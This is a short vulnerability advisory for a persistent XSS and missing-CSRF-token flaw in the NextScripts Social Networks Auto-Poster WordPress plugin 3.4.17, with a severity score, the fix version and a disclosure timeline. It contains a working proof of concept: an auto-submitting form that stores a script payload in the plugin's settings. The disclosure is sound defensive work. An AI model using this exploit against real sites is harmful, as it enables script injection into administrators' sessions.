NextScripts: Social Networks Auto-Poster 3.4.17, Persistent XSS
The NextScripts: Social Networks Auto-Poster plugin for WordPress is vulnerable to a Persistent XSS attack on the settings screen, due to a lack of sanitation of user input, and lack of CSRF token (nonce)
Homepage
https://wordpress.org/plugins/social-networks-auto-poster-facebook-twitter-g/
CVSS Score
3.9
CSSS Vector
(AV:N/AC:M/Au:S/C:P/I:P/A:N)
Attack Scope
remote
Authorization Required
None
Mitigation
Update to version 3.4.18.
Proof of Concept
If a page with the following FORM in is visited by an administrative user, it will result in a a Persistent XSS attack being triggered. In FireFox, this results in an immediate execution of the XSS payload. In Chrome, the XSS payload will be executed next time the user browses to the settings screen for this plugin.
<form id="form" method="POST" action="http://localhost/wp-admin/options-general.php?page=NextScripts_SNAP.php">
<input type="hidden" name="nxsMainFromElementAccts" value="wp[0][nName]=<script>alert(1)</script>&wp[0][apWPURL]=&wp[0][apWPUName]=1&wp[0][apWPPass]=1&wp[0][apDoWP]=1&wp[0][apWPMsgTFrmt]=&wp[0][apWPMsgFrmt]="/>
</form>
<script>
document.getElementById("form").submit();
</script>
Timeline
- 2015-05-18: Discovered
- 2015-05-18: Vendor notified
- 2015-05-18: Vendor responded
- 2015-05-18: Version 3.4.18 released – issue resolved
- 2015-05-25: Advisory released